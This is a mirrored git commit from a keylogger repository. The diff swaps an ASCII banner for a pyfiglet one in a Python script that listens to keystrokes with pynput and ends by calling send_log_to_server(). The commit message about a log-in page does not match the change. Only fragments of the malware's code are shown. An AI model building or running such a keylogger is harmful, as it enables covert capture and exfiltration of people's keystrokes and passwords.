mirror of
https://github.com/0x5t4l1n/Keylogger.git
synced 2026-05-26 19:36:31 +00:00
Sign/Log in page was added with good layout, visuals and responsiveness
This commit is contained in:
+6
-14
@@ -3,24 +3,16 @@ from pynput.keyboard import Listener, Key
|
||||
import os
|
||||
import requests
|
||||
import time
|
||||
import pyfiglet
|
||||
|
||||
# Use pyfiglet for CLI art as requested
|
||||
ascii_banner = pyfiglet.figlet_format("KEY LOGGER")
|
||||
print(ascii_banner)
|
||||
|
||||
print(r"""
|
||||
_ __ _
|
||||
| |/ /___ _ _ | | ___ __ _ __ _ ___ _ __
|
||||
| ' // _ \ | | | | | / _ \ / _` |/ _` |/ _ \ '__|
|
||||
| . \ __/ |_| | | |__| (_) | (_| | (_| | __/ |
|
||||
|_|\_\___|\__, | |_____\___/ \__, |\__, |\___|_|
|
||||
|___/ |___/ |___/
|
||||
0.1
|
||||
|
||||
|
||||
|
||||
|
||||
GitHub:https://github.com/Stalin-143
|
||||
""")
|
||||
|
||||
|
||||
|
||||
# Ask user for the desired log file location
|
||||
log_location = input("Please enter the full path for the log file (e.g., /path/to/logfile.txt): ")
|
||||
|
||||
@@ -100,4 +92,4 @@ with Listener(on_press=on_press, on_release=on_release) as listener:
|
||||
listener.join()
|
||||
|
||||
# Send logs when the listener stops (or periodically if needed)
|
||||
send_log_to_server()
|
||||
send_log_to_server()
|
||||
Reference in New Issue
Block a user